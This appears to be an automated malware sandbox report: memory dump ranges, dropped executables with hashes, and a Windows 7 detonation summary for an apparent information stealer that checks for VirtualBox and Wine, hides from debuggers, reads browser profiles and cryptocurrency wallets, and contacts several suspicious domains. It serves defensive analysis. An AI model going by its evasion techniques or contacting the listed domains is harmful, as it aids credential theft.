memory/4912-347-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4912-346-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4912-348-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4912-345-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4236-350-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1936-352-0x00000000008B0000-0x00000000012BD000-memory.dmp

memory/1812-355-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4236-357-0x0000000010000000-0x000000001001C000-memory.dmp

memory/2816-361-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/4912-363-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\APYB1149\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/4760-371-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1812-370-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1612-373-0x00000000008C0000-0x0000000000D7F000-memory.dmp

C:\Windows\Tasks\Test Task17.job

MD5 e98b04b624a464b1c29c568ce5c01d80
SHA1 0e2dbfea3364a1fe6e0a71cc73a9c816badf8ebc
SHA256 e1af114b172e3e860fffedc2dd9845bd9c55407915e2e3fa2178b93741e2f1ef
SHA512 3c62665d36228919f0af16328c1fe20a1f44f7bb15d6c20fe52ddb20f4c300516c10096830790fdf77abe6bc1c36308da1f5f3b7499bc9de1c346c61a7b2d45c

memory/1612-376-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/2816-378-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/4912-380-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe

MD5 5d153f73ce1b6a907cf87ddb04ba12b2
SHA1 bfda9ee8501ae0ca60f8e1803efea482085bf699
SHA256 2af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c
SHA512 0f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102

memory/2644-396-0x00000000002D0000-0x0000000000F21000-memory.dmp

memory/4760-398-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1812-399-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4760-400-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2816-402-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/4912-404-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe

MD5 8538c195a09066478922511ea1a02edf
SHA1 15e8910df845d897b4bb163caef4c6112570855b
SHA256 d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96
SHA512 60b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c

memory/1032-419-0x0000000000F50000-0x00000000013FB000-memory.dmp

memory/2644-420-0x00000000002D0000-0x0000000000F21000-memory.dmp

memory/2644-443-0x00000000002D0000-0x0000000000F21000-memory.dmp

C:\Users\Admin\Desktop\YCL.lnk

MD5 f63714e3ad1cc2dbf8465ca21b151566
SHA1 e294fcaedd5f255ae930ad78509e57001369a915
SHA256 838cc8e53c2ff83ce4ec76dac7679b9a888cd7923b9f60ff9194cad29283da25
SHA512 05e85a65ba2a618630fa850f53d555facd0ff3979376306b3a044b30f7524fd1cba3319a759b2044aedb1ac1e6127bab0ed27c141ea816c70b1143410ff375bf

C:\Users\Admin\AppData\Local\Temp\BWee4D3AYfw9GE1K6DFDSwdJt\Y-Cleaner.exe

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

memory/2644-467-0x00000000002D0000-0x0000000000F21000-memory.dmp

memory/4624-466-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1812-468-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4912-470-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4912-471-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4760-473-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1032-475-0x0000000000F50000-0x00000000013FB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe

MD5 2a48e7b047c5ff096c6dce52d4f26dbb
SHA1 e0d61e10b27131b1c34ade44d1a2117afd2cf099
SHA256 42642893c6a6af226aab5b2cce0875e7affebf7d1001146ddd90234d4c01492d
SHA512 75965d3aa7cda41ecc11f87b1ac2b12283d58650f5b96f2af560aff859ca74c0c0cb26dfc765b4d8318291d8f89fdbb338fb71ddf3f4b63389aedb5e2106165a

memory/2456-496-0x0000000000AB0000-0x0000000000DC4000-memory.dmp

memory/2816-497-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/4912-499-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe

MD5 338a31056b3b81d48a292a7bf9af67c7
SHA1 f5061e3583ba604b25e316f12fc58f40238d44b4
SHA256 cd1c085a07dc81e4305c2b9ee57e5c0433858c97cb20b1743cf44931c431ccea
SHA512 5bc7823cbd1ab6fa963df8f152d8b6de56af41159f3a736d147f1e5b4dcba3007319e2d2fb13e97f1e8b3cce3ab0d17e31d541be1ab53f8bd05a42316a940abc

memory/4432-514-0x0000000000D50000-0x00000000013D7000-memory.dmp

memory/4432-518-0x0000000000D50000-0x00000000013D7000-memory.dmp

memory/4760-520-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2456-528-0x0000000000AB0000-0x0000000000DC4000-memory.dmp

memory/3816-525-0x0000000000F30000-0x00000000013EF000-memory.dmp

memory/2456-524-0x0000000000AB0000-0x0000000000DC4000-memory.dmp

memory/3816-530-0x0000000000F30000-0x00000000013EF000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-05 23:11

Reported

2025-03-05 23:14

Platform

win7-20250207-en

Max time kernel

121s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe

"C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 272 -s 1216

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 172.67.189.66:443 moderzysics.top tcp

Files
